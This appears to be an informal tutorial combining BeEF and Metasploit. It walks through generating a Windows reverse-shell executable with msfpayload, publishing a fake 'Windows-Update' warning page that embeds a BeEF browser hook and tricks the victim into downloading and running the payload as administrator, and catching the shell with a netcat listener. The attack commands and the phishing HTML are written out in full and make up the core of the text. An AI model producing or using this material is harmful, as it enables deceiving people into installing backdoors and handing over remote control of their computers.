Improvement about Metasploit and beEf

fires step 

run our beEf

copy http://127.0.0.1/beef/ link to open beef interface.

second step

make payload using msfcli
type "msfpayload windows/shell_reverse_tcp LHOST=192.168.43.1 LPORT=9090 R | msfencode /var/www/is2c.exe"

 now we have make payload by name is2c.exe and put on /var/www/


third step

i just edit index.html on backtarck  at /var/www/index.html
this is a script a change it on index.html. on this script i put (beEf) java script on this index.html
  <html>
    <head></head>
    <title>Warning!!!!</title>
    <body><p align="center" class="style2"><u><b>Critical Vulnerabilty has detected!!</b></u><br><br>
    You can't continue your browsing, unless you download Windows-Update and run it as  administrator to
    fix the vulnerability. You can download Windows-Update here.<br>
    <input align="center" type="button" name="Button" value="Download Windows-Update" onCLick="window.open('is2c.exe', 'download'); return false;"></p>
    <script src='http://192.168.43.1/beef/hook/beefmagic.js.php'></script>
    </body>
    </html>

 on this beEf script i put my ip address 192.168.43.1 it's done for i can read what they do when opend.


oke now i just give a link for target open it.
http://192.168.43.1/    it's link open by target. this example target on my virualbox

it's mean we create a ruse to target file download windows update. 


than we cam see about information target by using our beEf when target press my link

back to target
target download on our link than our file is2c.exe on his computer.

than when he cklik our file we just wait it's will connected to us.


last step


we back to backtarck, open terminal  type
"nv -lvp 9090" enter

whit target press our payload when he is was download it.
if he press our file we can what happen on our terminal 


jreeeeeeeeeeeeeeeeeenggg... 
now we have on a target computer.

@keep smile & spirit
be fun